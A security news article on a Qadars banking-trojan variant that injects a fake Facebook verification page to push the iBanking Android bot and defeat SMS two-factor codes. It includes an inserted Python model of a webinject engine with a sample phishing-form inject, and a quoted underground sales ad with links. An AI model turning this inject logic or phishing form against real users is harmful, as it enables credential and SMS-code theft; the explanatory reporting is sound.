Android Trojan Virus: iBanking Malware ‘Qadars’ Targets Facebook Users via Webinjects


Cyber criminals have targeted millions of Facebook users through a sophisticated Android Trojan that can bypass the two-factor authentication shield used by Facebook mobile users, says Slovak security firm ESET.

ESET has identified a new variant of the banking Trojan ‘Qadars’, which injects rogue JavaScript code into Facebook pages when they are loaded in the browser of an infected computer.

The iBanking bot, once installed on a mobile phone, can spy on the user’s communications, redirect incoming voice calls, and even capture audio using the device’s microphone.

It is able to bypass SMS-based mobile two-factor authentication, commonly called the mobile transaction authentication number (mTAN) or mToken, which many financial institutions use to verify and authorize banking transactions.

How it works:

Once the user logs into Facebook from a browser on an infected computer, the malware injects a fake Facebook verification page into the site. The page asks for the user’s phone number and for confirmation that the phone or tablet runs Android, and leads to the malicious Android application.

Once the phone number is entered, the user is taken to an SMS verification step. This SMS verification page also instructs the user to download the application from the link provided, in case no message from Facebook arrives.

An installation guide then walks the user through installing the new application.

Once installed, the bot gives its operator complete control over the phone.

ESET has published a detailed infographic about the malware.

Jean-Ian Boutin, an ESET malware researcher, says, “The Trojan is able to intercept a webpage downloaded from a webserver, inspect it and inject new content into the page before showing it to the user. In the webinject configuration file I received, one of the targets was the Facebook website.”
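The webinject mechanism Boutin describes, and the fake verification page from the How it works section above, as an added example that is not ESET’s, Kafeine’s or the malware’s own code: a small Python parser for a Zeus-style webinject configuration (set_url, data_before, data_inject, data_after, data_end) and a function that rewrites the server’s HTML the way a man-in-the-browser Trojan would before the browser renders it. Whether Qadars uses exactly this syntax is an assumption here, and the configuration, target page and rule semantics below are constructed for illustration.

```python
"""Model of a man-in-the-browser webinject (added illustration, not Qadars code).

Assumed Zeus-style config syntax:  set_url <url-glob> <flags>, followed by
data_before / data_inject / data_after blocks, each closed by data_end.
Assumed semantics: the text between data_before and data_after is replaced
by data_inject; with an empty data_after, data_inject is inserted directly
after data_before.  Flags: G = apply on GET, P = apply on POST.
"""
from dataclasses import dataclass
from fnmatch import fnmatch
from typing import List, Optional


@dataclass
class InjectRule:
    url_glob: str
    flags: str
    data_before: str = ""
    data_inject: str = ""
    data_after: str = ""


def parse_webinject_config(text: str) -> List[InjectRule]:
    """Parse the config into rules; raises ValueError on malformed input."""
    rules: List[InjectRule] = []
    current: Optional[InjectRule] = None
    section: Optional[str] = None
    buf: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:                 # inside a data_* block
            if line == "data_end":
                setattr(current, section, "\n".join(buf).strip())
                section, buf = None, []
            else:
                buf.append(raw)                  # keep block content verbatim
            continue
        if not line or line.startswith(";"):     # blank line or comment
            continue
        if line.startswith("set_url"):
            parts = line.split()
            if len(parts) < 2:
                raise ValueError(f"bad set_url line: {raw!r}")
            current = InjectRule(parts[1], parts[2] if len(parts) > 2 else "GP")
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            if current is None:
                raise ValueError(f"{line} before any set_url")
            section = line
        else:
            raise ValueError(f"unrecognised directive: {raw!r}")
    if section is not None:
        raise ValueError(f"unterminated {section} block")
    return rules


def apply_webinjects(html: str, url: str, method: str, rules: List[InjectRule]) -> str:
    """Rewrite the server's HTML the way the trojan would before the browser renders it."""
    for rule in rules:
        if not (fnmatch(url, rule.url_glob) and method[0].upper() in rule.flags):
            continue
        start = html.find(rule.data_before) if rule.data_before else 0
        if start < 0:
            continue                             # marker missing: page left untouched
        insert_at = start + len(rule.data_before)
        end = html.find(rule.data_after, insert_at) if rule.data_after else insert_at
        if end < 0:
            continue
        html = html[:insert_at] + rule.data_inject + html[end:]
    return html


# Constructed sample config (not a real Qadars target list): add a fake
# "verify your phone" box, the first step of the flow described above.
SAMPLE_CONFIG = """
; fake verification box on any Facebook page
set_url https://www.facebook.com/* GP
data_before
<div id="home_stream">
data_end
data_inject
<div id="fb-verify"><b>Security verification</b>
Enter your mobile number to receive a confirmation SMS:
<form method="post" action="/verify"><input name="phone"></form></div>
data_end
data_after
data_end
"""

# Constructed page as the legitimate server sent it.
SERVED_HTML = '<html><body>\n<div id="home_stream">\n<p>Welcome back.</p>\n</div>\n</body></html>'


def demo() -> str:
    """What the victim's browser renders for a GET of the Facebook home page."""
    rules = parse_webinject_config(SAMPLE_CONFIG)
    return apply_webinjects(SERVED_HTML, "https://www.facebook.com/home.php", "GET", rules)


if __name__ == "__main__":
    print(demo())
```

Running the block prints the served page with the fake verification box inserted inside the stream container. The point for defenders is that the server’s response is untouched: the difference exists only in the victim’s browser, so server-side logs and TLS do not reveal the injection, and the injected form posts the phone number wherever the rule’s author chose.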

Challenges:

According to independent researcher Kafeine, this application was on sale in underground forums with a detailed explanation of how it works.

The website selling the bot lists its features as:

  • Grabbing all information about the victim (phone number, ICCID, IMEI, IMSI, model, OS)
  • Interception of incoming SMS messages and sending them to the web panel and the control room
  • Call forwarding to any number
  • Grabbing all incoming and outgoing SMS
  • Grabbing all incoming and outgoing calls
  • Grabbing the contact book (names and numbers)
  • Recording audio and sending it to the server (know what is happening around the device)
  • Sending SMS to any number without the owner’s knowledge
  • The application cannot be removed if the owner granted it administrator rights when installing it
  • Function to wipe the device to factory settings (if admin rights were granted)

Our coders will easily finalize your desired functionality for you.

Easy web panel: here is the socket to work with bots; whoever wants to try it live, write to us for a test account.
http://www.tmn-security.pt/ris.JPG

A manual for the bot, produced just for you:
http://www.tmn-security.pt/manual.pdf

RSA, an IT security firm, recently tracked a forum post that leaked the source code of the iBanking mobile bot’s control panel. The leaked files also included a builder that cyber criminals can use, in various configurations and combinations, to create unique, customised applications.

The security firm also noted that the bot’s web-based control panel gives its masters complete control of the infected mobile device.

The researchers further note,

“This highlights the need for stronger authentication solutions capable of validating users’ identities using multiple factors including biometric solutions. The latter will also assist in reducing the dependency on conscious human intervention making social engineering attempts void.”
